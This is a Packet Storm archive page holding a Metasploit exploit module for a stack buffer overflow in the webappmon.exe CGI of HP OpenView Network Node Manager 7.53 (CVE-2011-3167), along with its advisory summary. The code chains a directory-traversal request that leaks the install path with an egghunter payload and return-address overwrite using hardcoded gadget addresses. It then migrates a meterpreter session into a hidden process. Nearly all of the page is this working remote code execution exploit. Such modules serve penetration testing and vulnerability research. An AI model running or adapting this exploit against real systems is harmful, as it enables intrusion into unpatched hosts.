Exploit the possiblities

HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow

HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
Posted Jan 20, 2012
Authored by sinn3r, Aniway, juan vazquez | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function "_OVConcatPath" which finally uses "strcat" in a insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path.

tags | exploit, overflow, arbitrary, cgi
advisories | CVE-2011-3167, OSVDB-76775
MD5 | d931eb96f3799819a223e13af334d81a

HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Egghunter

def initialize(info={})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node
Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long
'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can
cause a stack-based buffer overflow and execute arbitrary code.

The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There
are no stack cookies, so exploitation is achieved by overwriting the saved return
address.

The vulnerability is due to the use of the function "_OVConcatPath" which finally
uses "strcat" in a insecure way. User controlled data is concatenated to a string
which contains the OpenView installation path.

To achieve reliable exploitation a directory traversal in OpenView5.exe
(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation
path. If the installation path cannot be guessed the default installation path
is used.
} ,
'Author' =>
[
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
'juan vazquez', # Metasploit module
'sinn3r' # Metasploit fu
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3167' ],
[ 'OSVDB', '76775' ],
[ 'BID', '50471' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]
],
'Payload' =>
{
'Space' => 950,
'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"),
'DisableNops' => true,
'EncoderOptions' =>
{
'BufferRegister' => 'EDI' # Egghunter jmp edi
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',
# Patches installed:
# * ECS_00048
# * NNM_01128
# * NNM_01172
# * NNM_01187
{
'Offset' => 1067,
'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)
'JmpESP' => 0x5a4251c5, # call esp - in ov.dll
'EggAdjust' => 4,
'ReadableAddress' => 0x5a466930 # ov.dll
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 01 2011'))

register_options(
[
Opt::RPORT(80),
], self.class)
end

# The following code allows to migrate if having into account
# that over Windows XP permissions aren't granted on %windir%\system32
#
# Code ripped from "modules/post/windows/manage/migrate.rb". See it
# for more information
def on_new_session(client)

if client.type != "meterpreter"
print_error("NOTE: you must use a meterpreter payload in order to process migration.")
return
end

client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

# Select path and executable to run depending the architecture
# and the operating system
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
windir = client.fs.file.expand_path("%ProgramFiles%")
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
else # Windows 2000
windir = client.fs.file.expand_path("%windir%")
if client.sys.config.sysinfo['Architecture'] =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"
else
cmd = "#{windir}\\Sysnative\\notepad.exe"
end
end

# run hidden
print_status("Spawning #{cmd.split("\\").last} process to migrate to")
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
target_pid = proc.pid

begin
print_good("Migrating to #{target_pid}")
client.core.migrate(target_pid)
print_good("Successfully migrated to process #{target_pid}")
rescue ::Exception => e
print_error("Could not migrate in to process.")
print_error(e.to_s)
end

end

# Tries to guess the HP OpenView install dir via the Directory traversal identified
# by OSVDB 44359.
# If OSVDB 44359 doesn't allow to retrieve the installation path the default one
# (C:\Program Files\HP OpenView\) is used.
# Directory Traversal used:
# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log
def get_install_path

cgi = '/OvCgi/OpenView5.exe'
web_session = rand_text_numeric(3)
my_cookie = "OvOSLocale=English_United States.1252; "
my_cookie << "OvAcceptLang=en-US; "
my_cookie << "OvJavaLocale=en_US.Cp1252; "
my_cookie << "OvWebSession=#{web_session}:AnyUser:"

payload = "../../../log/setup.log"
res = send_request_cgi({
'uri' => cgi,
'cookie' => my_cookie,
'method' => "GET",
'vars_get' =>
{
'Target' => "Main",
'Scope' => "Snmp",
'Action' => payload
}
}, 5)

installation_path = ""
if res and res.code == 200 and
res.body =~ /([A-Z]:\\.*\\)log/
print_status("Installation Path Found in #{$1}")
installation_path = $1
else
print_status("Installation Path Not Found using the default")
installation_path = "C:\\Program Files\\HP OpenView\\"
end

return installation_path
end

def exploit
print_status("Trying target #{target.name}...")

install_path = get_install_path
install_path << "help\\English_United States.1252"

eggoptions = {
:checksum => true,
}
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

[ 'x86/alpha_mixed'].each { |name|
enc = framework.encoders.create(name)
if name =~/alpha/
# If control is transferred to the decoder via "call esp" BufferOfset
# shoulds be adjusted.
if target["EggAdjust"] and target["EggAdjust"] > 0
enc_options = {
'BufferRegister' => 'ESP',
'BufferOffset' => target["EggAdjust"]
}
enc.datastore.import_options_from_hash(enc_options)
else
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
end
end
hunter = enc.encode(hunter, nil, nil, platform)
}

offset = target['Offset'] - install_path.length - egg.length

my_payload = egg
my_payload << rand_text_alphanumeric(offset)
my_payload << [target.ret].pack("V")
my_payload << rand_text_alphanumeric(4) # Padding
my_payload << [target["ReadableAddress"]].pack("V")
my_payload << [target["JmpESP"]].pack("V")
my_payload << hunter

buf = "-textFile+#{my_payload}+++++++++++++++++++++++"
buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++"
buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++"
buf << "-dataLine+2+"
buf << "-commandTitle+%22Services%22+%09%09++++++"
buf << "-iconName+%22Services%22+++++++++++++++++++++++"
buf << "-cmd+rnetstat+"
buf << "-S"

web_session = rand_text_numeric(3)
my_cookie = "OvOSLocale=English_United States.1252; "
my_cookie << "OvAcceptLang=en-US; "
my_cookie << "OvJavaLocale=en_US.Cp1252; "
my_cookie << "OvWebSession=#{web_session}:AnyUser:"

cgi = '/OvCgi/webappmon.exe'

res = send_request_cgi({
'uri' => cgi,
'cookie' => my_cookie,
'method' => "POST",
'vars_post' =>
{
'ins' => 'nowait',
'sel' => rand_text_alphanumeric(15),
'app' => 'IP Tables',
'act' => 'Services',
'help' => '',
'cache' => rand_text_numeric(4)
},
'data' => "arg=#{buf}" # Avoid uri encoding
}, 3)

if res and res.code != 502
print_error("Eek! We weren't expecting a response, but we got one")
if datastore['DEBUG']
print_line()
print_error(res.inspect)
end
end

handler

end

end

=begin

* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3

meterpreter > run post/windows/manage/migrate

[*] Running module against HOME-F006222D6C
[*] Current server process: webappmon.exe (7064)
[*] Spawning notepad.exe process to migrate to
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
[-] Call stack:
[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
[-] (eval):80:in `create_temp_proc'
[-] (eval):49:in `run'
=end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close